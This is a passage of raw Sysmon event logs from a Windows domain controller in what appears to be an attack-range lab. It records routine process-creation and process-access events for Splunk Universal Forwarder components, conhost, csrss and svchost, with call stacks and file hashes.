Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.159{59A5CD1D-8F68-6005-F700-00000000A301}44124384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SY